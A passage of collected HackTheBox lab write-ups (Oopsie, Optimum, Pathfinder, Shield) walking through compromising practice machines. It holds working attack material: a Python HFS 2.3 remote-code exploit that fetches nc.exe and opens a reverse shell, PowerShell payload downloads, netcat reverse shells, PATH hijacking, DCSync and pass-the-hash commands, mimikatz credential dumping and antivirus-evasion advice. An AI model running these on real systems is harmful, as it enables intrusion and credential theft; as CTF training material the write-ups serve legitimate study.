uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker) 210 | ``` 211 | 212 | Robert is also member of the `bugtracker` group, so we can now further investigate the `bugtracker` binary. 213 | 214 | Running the binary with input `1` outputs following: 215 | ``` 216 | robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker 217 | 218 | ------------------ 219 | : EV Bug Tracker : 220 | ------------------ 221 | 222 | Provide Bug ID: 1 223 | --------------- 224 | 225 | Binary package hint: ev-engine-lib 226 | 227 | Version: 3.3.3-1 228 | 229 | Reproduce: 230 | When loading library in firmware it seems to be crashed 231 | 232 | What you expected to happen: 233 | Synchronized browsing to be enabled since it is enabled for that site. 234 | 235 | What happened instead: 236 | Synchronized browsing is disabled. Even choosing VIEW > SYNCHRONIZED BROWSING from menu does not stay enabled between connects. 237 | ``` 238 | 239 | Let's try some weird input like a negative number: 240 | 241 | ``` 242 | robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker 243 | 244 | ------------------ 245 | : EV Bug Tracker : 246 | ------------------ 247 | 248 | Provide Bug ID: -1 249 | --------------- 250 | 251 | cat: /root/reports/-1: No such file or directory 252 | ``` 253 | 254 | So it's bascially just appending our input to a directory string... we can modify it in such a way, that it will print the root.txt for us. 255 | 256 | ``` 257 | robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker 258 | 259 | ------------------ 260 | : EV Bug Tracker : 261 | ------------------ 262 | 263 | Provide Bug ID: ../root.txt 264 | --------------- 265 | 266 | af13b0bee69f8a877c3faf667f7beacf 267 | ``` 268 | There we go. We pwned the machine. 269 | 270 | ## Post Exploitation 271 | 272 | For the next challenge we need FTP credentials, which are stored in this file: 273 | 274 | ``` 275 | root@oopsie:/root/.config/filezilla# more filezilla.xml 276 | 277 | 278 | 279 | 280 | 10.10.10.46 281 | 21 282 | 0 283 | 0 284 | ftpuser 285 | mc@F1l3ZilL4 286 | 1 287 | 0 288 | MODE_DEFAULT 289 | 0 290 | Auto 291 | 0 292 | 293 | 294 | 295 | ``` 296 | 297 | Either "guess" this common filename or extend the privilege escalation by doing following: 298 | 299 | As we know that the bugtracker binary calls `cat filename`, we can simply modify the cat binary for our user. 300 | 301 | ``` 302 | export PATH=/tmp/:$PATH 303 | 304 | cd /tmp && echo '/bin/bash' > cat && chmod +x cat 305 | ``` 306 | 307 | Now when executing the `bugtracker` binary, we get a root-shell. 308 | 309 | -------------------------------------------------------------------------------- /Oopsie/pics/accounting.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/accounting.png -------------------------------------------------------------------------------- /Oopsie/pics/accounts_uri.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/accounts_uri.png -------------------------------------------------------------------------------- /Oopsie/pics/apache_website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/apache_website.png -------------------------------------------------------------------------------- /Oopsie/pics/branding.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/branding.png -------------------------------------------------------------------------------- /Oopsie/pics/burpsuite_sitemap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/burpsuite_sitemap.png -------------------------------------------------------------------------------- /Oopsie/pics/burpsuite_sniper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/burpsuite_sniper.png -------------------------------------------------------------------------------- /Oopsie/pics/clients.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/clients.png -------------------------------------------------------------------------------- /Oopsie/pics/cookies.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/cookies.png -------------------------------------------------------------------------------- /Oopsie/pics/hint_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/hint_login.png -------------------------------------------------------------------------------- /Oopsie/pics/logged_in.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/logged_in.png -------------------------------------------------------------------------------- /Oopsie/pics/login_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/login_page.png -------------------------------------------------------------------------------- /Oopsie/pics/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/shell.png -------------------------------------------------------------------------------- /Oopsie/pics/super_admin_info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/super_admin_info.png -------------------------------------------------------------------------------- /Oopsie/pics/upload_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/upload_shell.png -------------------------------------------------------------------------------- /Oopsie/pics/uploads.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/uploads.png -------------------------------------------------------------------------------- /Oopsie/pics/uploads_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/uploads_page.png -------------------------------------------------------------------------------- /Optimum/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | 3 | # Optimum (Windows) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | rustscan --ulimit 5000 10.129.1.127 -- -sC -sV -o port_scan 9 | 10 | PORT STATE SERVICE REASON VERSION 11 | 80/tcp open http syn-ack HttpFileServer httpd 2.3 12 | |_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1 13 | | http-methods: 14 | |_ Supported Methods: GET HEAD POST 15 | |_http-server-header: HFS 2.3 16 | |_http-title: HFS / 17 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 18 | ``` 19 | 20 | Looking at the open port 80 via the Browser, we see following page: 21 | 22 | ![](pics/website.png) 23 | 24 | The server is hosting a HTTPFileServer version 2.3. Doing some research shows, that this specific version has some kind of Remote Code Injection vulnerability. 25 | 26 | ## Exploitation 27 | 28 | The version of the File server uses a library `ParserLib.pas`, which contains a vulnerable function `findMacroMarker` 29 | 30 | ``` 31 | function findMacroMarker(s:string; ofs:integer=1):integer; 32 | begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end; 33 | ``` 34 | 35 | *"Rejetto HFS versions 2.3, 2.3a, and 2.3b are vulnerable to remote command execution due to a regular expression in parserLib.pas that fails to handle null bytes. Commands that follow a null byte in the search string are executed on the host system.* " (https://www.kb.cert.org/vuls/id/251276) 36 | 37 | Such a command must be written in the HFS scripting language format. E.g commands can be executed as follows: 38 | 39 | ``` 40 | http://localhost:80/?search=%00{.exec|.} 41 | ``` 42 | 43 | This will stop the regex from parsing the macro and instead execute the command. 44 | 45 | 46 | To abuse the vulnerability, I used this script here (might have to execute it several times). You also need to start a http server, from which the script then can download the `nc.exe`, in order to create a reverse shell to your machine. 47 | 48 | ```python 49 | import urllib2 50 | import sys 51 | 52 | try: 53 | def script_create(): 54 | urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") 55 | 56 | def execute_script(): 57 | urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") 58 | 59 | def nc_run(): 60 | urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") 61 | 62 | ip_addr = "10.10.14.26" #local IP address 63 | local_port = "4444" # Local Port number 64 | vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" 65 | save= "save|" + vbs 66 | vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" 67 | exe= "exec|"+vbs2 68 | vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port 69 | exe1= "exec|"+vbs3 70 | script_create() 71 | execute_script() 72 | nc_run() 73 | except: 74 | print """[.]Something went wrong..! 75 | Usage is :[.] python exploit.py 76 | Don't forgot to change the Local IP address and Port number on the script""" 77 | 78 | ``` 79 | 80 | If everything is setup correctly, we can run the script and receive a reverse shell: 81 | 82 | ``` 83 | C:\Users\kostas\Desktop>whoami 84 | whoami 85 | optimum\kostas 86 | ``` 87 | 88 | Instead of using this script, the vulnerability can also be manually exploited, by creating a Powershell reverse shell (watch e.g. `Ippsec`: https://www.youtube.com/watch?v=kWTnVBIpNsE). 89 | 90 | Also a Metasploit exploit module is available. 91 | 92 | 93 | ## Privilege Escalation 94 | 95 | Now that we have access to the server, we can look for a way to escalate our privileges. Therefore, we copy the `systeminfo` output to our local machine and use `Windows-Exploit-Suggester` (https://github.com/AonCyberLabs/Windows-Exploit-Suggester) to identify a possible vulnerability. 96 | 97 | Going through the list, I stumbled upon this vulnerability: https://www.exploit-db.com/exploits/41020 ([Details](https://sensepost.com/blog/2017/exploiting-ms16-098-rgnobj-integer-overflow-on-windows-8.1-x64-bit-by-abusing-gdi-objects/), [Binary](https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe)). 98 | 99 | As wget and curl are both not available for our current user, we have to use Powershell. 100 | 101 | ``` 102 | PowerShell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.26/41020.exe', 'c:\Users\Public\Downloads\41020.exe')" 103 | ``` 104 | 105 | Afterwards, we can use the exploit to obtain system privileges. 106 | 107 | ``` 108 | C:\Users\Public\Downloads>41020.exe 109 | 41020.exe 110 | Microsoft Windows [Version 6.3.9600] 111 | (c) 2013 Microsoft Corporation. All rights reserved. 112 | 113 | C:\Users\Public\Downloads>whoami 114 | whoami 115 | nt authority\system 116 | ``` 117 | 118 | ## Post-Exploitation 119 | 120 | User Flag 121 | ``` 122 | type user.txt.txt 123 | d0c39409d7b994a9a1389ebf38ef5f73 124 | ``` 125 | 126 | Root Flag 127 | 128 | ``` 129 | type root.txt 130 | 51ed1b36553c8461f4552c2e92b3eeed 131 | ``` -------------------------------------------------------------------------------- /Optimum/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Optimum/pics/logo.png -------------------------------------------------------------------------------- /Optimum/pics/website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Optimum/pics/website.png -------------------------------------------------------------------------------- /Pathfinder/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Pathfinder 2 | 3 | ## Enumeration 4 | 5 | ``` 6 | PORT STATE SERVICE REASON VERSION 7 | 53/tcp open domain syn-ack Simple DNS Plus 8 | 88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2021-01-04 22:00:22Z) 9 | 135/tcp open msrpc syn-ack Microsoft Windows RPC 10 | 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 11 | 389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) 12 | 445/tcp open microsoft-ds? syn-ack 13 | 464/tcp open kpasswd5? syn-ack 14 | 593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 15 | 636/tcp open tcpwrapped syn-ack 16 | 3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) 17 | 3269/tcp open tcpwrapped syn-ack 18 | 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 19 | |_http-server-header: Microsoft-HTTPAPI/2.0 20 | |_http-title: Not Found 21 | 9389/tcp open mc-nmf syn-ack .NET Message Framing 22 | 47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 23 | |_http-server-header: Microsoft-HTTPAPI/2.0 24 | |_http-title: Not Found 25 | 49664/tcp open msrpc syn-ack Microsoft Windows RPC 26 | 49665/tcp open msrpc syn-ack Microsoft Windows RPC 27 | 49666/tcp open msrpc syn-ack Microsoft Windows RPC 28 | 49667/tcp open msrpc syn-ack Microsoft Windows RPC 29 | 49671/tcp open msrpc syn-ack Microsoft Windows RPC 30 | 49676/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 31 | 49677/tcp open msrpc syn-ack Microsoft Windows RPC 32 | 49683/tcp open msrpc syn-ack Microsoft Windows RPC 33 | 49698/tcp open msrpc syn-ack Microsoft Windows RPC 34 | 49718/tcp open msrpc syn-ack Microsoft Windows RPC 35 | Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows 36 | ``` 37 | 38 | There are many ports open! Port 88 is typically associated with Kerberos and port 389 with LDAP, which indicates that this is a Domain Controller. 39 | 40 | ## Preparation 41 | Using the credentials we obtained in a previous machine; `sandra:Password1234!`, we can attempt to enumerate Active Directory. We can achieve this using BloodHound. There is a python bloodhound ingester. It can be installed using pip: `pip install bloodhound` 42 | 43 | Then run 44 | ``` 45 | python3 -m bloodhound -d megacorp.local -u sandra -p 'Password1234' -gc pathfinder.megacorp.local -c all -ns 10.10.10.30 46 | ``` 47 | This will store several json files in the current directory, which will later be imported into Bloodhound. 48 | 49 | The next step is to install `neo4j`, which is an open source graph database. 50 | ``` 51 | $ sudo apt install neo4j 52 | $ sudo neo4j console 53 | ``` 54 | Afterwards go to `localhost:7474`, connect to the database with the credentials `neoj4:neo4j` and change the password. 55 | 56 | The last step is to install bloodhound. BloodHound is an application developed with one purpose: to find relationships within an Active Directory (AD) domain to discover attack paths. 57 | 58 | Run it with: 59 | 60 | ``` 61 | sudo bloodhound --no-sandbox 62 | ``` 63 | 64 | It will open a GUI and will ask you for your database credentials, which you have set up when configuring neo4j. 65 | 66 | Then, upload all the json files into Bloodhound. 67 | 68 | ## Analysis 69 | 70 | Bloodhound offeres several Pre-Built Analysis queries 71 | 72 | ![](pics/bloodhound-analysis.png) 73 | 74 | Choosing the "FInd Principles with DCSync Rights", we can see that the svc_bes has GetChangesAll privileges to the domain. This means that the account has the ability to request replication data from the domain controller, and gain sensitive information such as user hashes. 75 | 76 | ![](pics/bloodhound_output.png) 77 | 78 | ## Exploitation 79 | 80 | It's worth checking if Kerberos pre-authentication has been disabled for this account, which means it is vulnerable to ASREPRoasting. We can check this using a tool such as Impacket's GetNPUsers. 81 | 82 | ``` 83 | $ python3 GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30 84 | Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation 85 | 86 | [*] Getting TGT for svc_bes 87 | $krb5asrep$23$svc_bes@MEGACORP.LOCAL:d71a0a828dafb52440d7161c2a46d29c$7eaf00d192586f0c3aa80e8ae980e7e6428c71df4fde76885a5da8aa39cf4a21b0ed392d15a22147d50b3bed445a655de8b3aebe5cd7ecb07a94faad74ed5000c14ec727d5e932ac30cf9fc634ee62d1340088f3cac2c944617c502a7845334cccb9f73129b03e4ca2c7caa95d05475e33ad467bc2faa440976b56484b6ecfa053dce6ce430bceb3517ac5a68a5139eea944bf83581c04a9be9b154a480461b5cfff2e87bb9a322262d3a48116eba863a77ad8da1497a6b1aa353e66fdfce21af5db3a5e972f95516ddce0b05c287338258ed73c4b1cef7dde5fd02b7e750cb7e745a1707e11b4e636a04fdc896586db 88 | ``` 89 | 90 | We obtain the TGT ticket for the `svc_bes` and save it to a file called hash. Now we have to crack it with a tool e.g `john` 91 | 92 | ``` 93 | $ sudo john hash -w=/usr/share/wordlists/rockyou.txt 94 | [sudo] password for ctf: 95 | Using default input encoding: UTF-8 96 | Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) 97 | Press 'q' or Ctrl-C to abort, almost any other key for status 98 | Sheffield19 ($krb5asrep$23$svc_bes@MEGACORP.LOCAL) 99 | 1g 0:00:00:26 DONE (2021-01-04 15:23) 0.03743g/s 396967p/s 396967c/s 396967C/s Sheffwed1..Sheethead? 100 | Use the "--show" option to display all of the cracked passwords reliably 101 | Session completed 102 | ``` 103 | 104 | It is now possible to access the server as svc_bes using WinRM, and gain user.txt (password: Sheffield19) 105 | 106 | ``` 107 | evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19 108 | ``` 109 | 110 | The user.txt is located on svc_bes's Desktop: `b05fb166688a8603d970c6d033f637f1` 111 | 112 | ## Privilege Escalation 113 | In order to leverage the GetChangesAll permission, we can use Impacket's secretsdump.py to perform a DCSync attack and dump the NTLM hashes of all domain users. 114 | 115 | ``` 116 | $ python3 secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30 117 | Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation 118 | 119 | [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) 120 | [*] Using the DRSUAPI method to get NTDS.DIT secrets 121 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18::: 122 | Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 123 | krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3::: 124 | svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca::: 125 | sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d::: 126 | PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:4daaf43d62196be359323e580d7d1a22::: 127 | [*] Kerberos keys grabbed 128 | Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f 129 | Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b 130 | Administrator:des-cbc-md5:f1c89e75a42cd0fb 131 | krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d 132 | krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce 133 | krbtgt:des-cbc-md5:d0f8d0c86ee9d997 134 | svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238 135 | svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0 136 | svc_bes:des-cbc-md5:1cc16e37ef8940b5 137 | sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810 138 | sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44 139 | sandra:des-cbc-md5:23988f7a9d679d37 140 | PATHFINDER$:aes256-cts-hmac-sha1-96:9746728aa86c802b483aa9304887a8b60e5f5d5895bfd1c182dbaa5f684226f3 141 | PATHFINDER$:aes128-cts-hmac-sha1-96:a45fe07f2fc61fbebafce78f73a97644 142 | PATHFINDER$:des-cbc-md5:e364941fc7ef5dd3 143 | [*] Cleaning up... 144 | ``` 145 | 146 | Using the default domain administrator NTLM hash, we can use this in a PTH attack to gain elevated access to the system. For this, we can use Impacket's psexec.py. 147 | 148 | ``` 149 | psexec.py megacorp.local/administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18 150 | ``` 151 | 152 | And we are root! Now we can obtain the root.txt which is located in C:\Users\Administrator\Desktop: `ee613b2d048303e5fd4ac6647d944645` 153 | -------------------------------------------------------------------------------- /Pathfinder/pics/bloodhound-analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Pathfinder/pics/bloodhound-analysis.png -------------------------------------------------------------------------------- /Pathfinder/pics/bloodhound_output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Pathfinder/pics/bloodhound_output.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hack the Box - Writeups 2 | 3 | ## Starting point 4 | 5 | - [Oopsie](Oopsie) [Linux, Web, Cookies] 6 | - [Vaccine](Vaccine) [Linux, Web, John, SQL Injection] 7 | - [Shield](Shield) [Windows, Wordpress, Metasploit] 8 | - [Pathfinder](Pathfinder) [Windows, Active Directory, Kerberos, Attack Graph] 9 | - [Included](Included) [Linux, Web, LFI, Upload, lxc] 10 | - [Markup](Markup) [Windows, XXE] 11 | - [Guard](Guard) [Linux, Restricted Shell, Cracking] 12 | - [Base](Base) [Linux, PHP authentication, Directory Discovery] 13 | 14 | ## Machines 15 | 16 | - [Lame](Lame) [Linux, smb] 17 | - [Legacy](Legacy) [Windows, well known vulnerability] 18 | - [Beep](Beep) [Linux, LFI, FreePBX, elastix, vtigerCRM, SMTP] 19 | - [Devel](Devel) [Windows, IIS, Priv-Esc] 20 | - [Optimum](Optimum) [Windows, HttpFileServer, Priv-Esc] 21 | - [Bank](Bank) [Linux, DNS, Routing] 22 | - [Blocky](Blocky) [Linux, SQL, Wordpress] 23 | - [Shocker](Shocker) [Linux, well known vulnerability, cgi] 24 | - [Mirai](Mirai) [Linux, well known vulnerability, data recovery] 25 | - [Valentine](Valentine) [Linux, well known vulnerability] 26 | - [Laboratory](Laboratory) [Linux, Gitlab RCE/LFI] 27 | - [Academy](Academy) [Linux, Laravel] 28 | - [Doctor](Doctor)[Linux, SSTI, splunk] 29 | 30 | ## Challenges 31 | 32 | - [RE: Find The Easy Pass](FindTheEasyPass) [exe] 33 | -------------------------------------------------------------------------------- /Shield/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Shield 2 | 3 | ## Enumeration 4 | 5 | ``` 6 | PORT STATE SERVICE REASON VERSION 7 | 80/tcp open http syn-ack Microsoft IIS httpd 10.0 8 | | http-methods: 9 | | Supported Methods: OPTIONS TRACE GET HEAD POST 10 | |_ Potentially risky methods: TRACE 11 | |_http-server-header: Microsoft-IIS/10.0 12 | |_http-title: IIS Windows Server 13 | 3306/tcp open mysql syn-ack MySQL (unauthorized) 14 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 15 | ``` 16 | 17 | ### Examining Port 80 - Windows Server Internet Information Service (IIS) 18 | 19 | ![](pics/webserver.png) 20 | 21 | Navigating to Port 80, we can see the default IIS starting page (which is typical for Windows Server hosted websites). So we probably have to find the real application/directories by ourselves. 22 | 23 | Therefore, we gonna use a tool like `gobuster`: 24 | ``` 25 | gobuster dir -u "http://10.10.10.29" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 26 | ``` 27 | 28 | It relatively quickly finds a directory called `/wordpress`. Let's head over to this. 29 | 30 | ![](pics/wordpress.png) 31 | 32 | The wordpress website is apparently a company's website that deals with electric trucks. It has two big buttons, which both have no functionality. Furthermore, it has an additional tab called `BLOG`, which leads us to their blog (also implemented with wordpress). 33 | 34 | ![](pics/blog.png) 35 | 36 | On the blog-website, we also have the possibility to Login, which leads us to following website: 37 | 38 | ![](pics/wp_login.png) 39 | 40 | I tried bruteforcing the login with username `admin`, as Wordpress has the bad behaviour of leaking usernames. It basically gives you a different error message, if you guessed the username correctly. 41 | 42 | ![](pics/error1.png) 43 | 44 | ![](pics/error2.png) 45 | 46 | Unfortunately, I had no success in doing so. After a few hours of research, I took a look at the official writeup of the room... In the writeup they state: `Since we have already acquired the password P@s5w0rd!, we can try to login to the WordPress site.`..Wait. Where and how did we acquire that exactly? That's what I asked in the official Discord server. Their answer was pretty much like "That's the password of the DB user in the previous machine! It's obvious that you should test that password for the Wordpress admin in this machine" .... riiiiiiight. 47 | 48 | Anyway... 49 | 50 | ## Exploitation 51 | Now that we are logged in with the **obvious** credentials `admin:P@s5w0rd!`, and have full access to the Wordpress admin dashboard, we can setup a reverse shell to the server. We gonna use `metasploit` for that, as windows systems are always a bit tricky. 52 | 53 | So we open `msfconsole` and search for a suiteable module. 54 | 55 | ![](pics/metasploit_search.png) 56 | 57 | We type `use 0` to select this module. Afterwards we type `show options` to see all the options we can and must set. 58 | 59 | ![](pics/metasploit_options.png) 60 | 61 | After configuring it for our machine like that: 62 | 63 | ![](pics/metasploit_filled_options.png) 64 | 65 | we can start the exploit. 66 | 67 | ![](pics/metasploit_run.png) 68 | 69 | By typing `sysinfo` we get some information about the system: 70 | 71 | ``` 72 | meterpreter > sysinfo 73 | Computer : SHIELD 74 | OS : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586 75 | Meterpreter : php/windows 76 | ``` 77 | 78 | We see that this is a rather old Windows Server version. Let's see if it has any know vulnerabilities regarding privilege escalation. 79 | 80 | And indeed! It's called `Rotten Potato` ([Github](https://github.com/foxglovesec/RottenPotato), [Youtube](https://www.youtube.com/watch?v=8Wjs__mWOKI)). For our case, we will use a slight modification of that exploit called `Juicy Potato` ([Github]( https://github.com/ohpe/juicy-potato/)). 81 | 82 | ### Upload Netcat 83 | 84 | Download `nc.exe` from [here](https://github.com/int0x33/nc.exe/blob/master/nc.exe). Afterwards, change the directory in your meterpreter session to 85 | ``` 86 | C:/inetpub/wwwroot/wordpress/wp-content/uploads 87 | ``` 88 | Then upload the `nc.exe` file. To execute it use following command: 89 | 90 | ``` 91 | msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.125 1234" 92 | ``` 93 | 94 | This only works ofc, if you have a nc listerner running. 95 | 96 | ### Prepare the Juicy Potato Exploit 97 | 98 | We can create a batch file that will be executed by the exploit and return a SYSTEM shell. Let's add the following contents to `shell.bat` (run it from the nc reverse shell). 99 | 100 | ``` 101 | echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.125 1111 > shell.bat 102 | ``` 103 | 104 | Now start another nc listener on your local machine with the port specified in `shell.bat`. 105 | 106 | Afterwards, we upload the Juicy Pototo exe with an uncommon name (I chose jp.exe), so that the windows defender won't detect it. 107 | 108 | The final step is to execute the Juicy Potato exe with the previously generated `shell.bat` file like so: 109 | 110 | ``` 111 | jp.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 112 | ``` 113 | 114 | ![](pics/system_shell.png) 115 | 116 | The root.txt is located in C:\Users\Administrator\Desktop: `6e9a9fdc6f64e410a68b847bb4b404fa` 117 | 118 | ## Post Exploitation 119 | 120 | [Mimikatz](https://github.com/sebastiendamaye/hackthebox/raw/master/01-starting_point/04-Shield/files/mimikatz.exe) can be used to find additional cached passwords on the machine. This might be useful for the next challenge. 121 | 122 | So we upload the exe from the meterpreter session and execute it: 123 | 124 | ``` 125 | meterpreter > upload mimikatz.exe 126 | ``` 127 | 128 | Then do following in the System shell: 129 | 130 | ``` 131 | $ .\mimikatz.exe 132 | 133 | $ mimikatz> sekurlsa::logonpasswords 134 | 135 | ... 136 | 137 | Authentication Id : 0 ; 216075 (00000000:00034c0b) 138 | Session : Interactive from 1 139 | User Name : sandra 140 | Domain : MEGACORP 141 | Logon Server : PATHFINDER 142 | Logon Time : 1/4/2021 11:12:16 AM 143 | SID : S-1-5-21-1035856440-4137329016-3276773158-1105 144 | msv : 145 | [00000003] Primary 146 | * Username : sandra 147 | * Domain : MEGACORP 148 | * NTLM : 29ab86c5c4d2aab957763e5c1720486d 149 | * SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38 150 | * DPAPI : f4c73b3f07c4f309ebf086644254bcbc 151 | tspkg : 152 | wdigest : 153 | * Username : sandra 154 | * Domain : MEGACORP 155 | * Password : (null) 156 | kerberos : 157 | * Username : sandra <-- USERNAME 158 | * Domain : MEGACORP.LOCAL 159 | * Password : Password1234! <-- PASSWORD 160 | ssp : 161 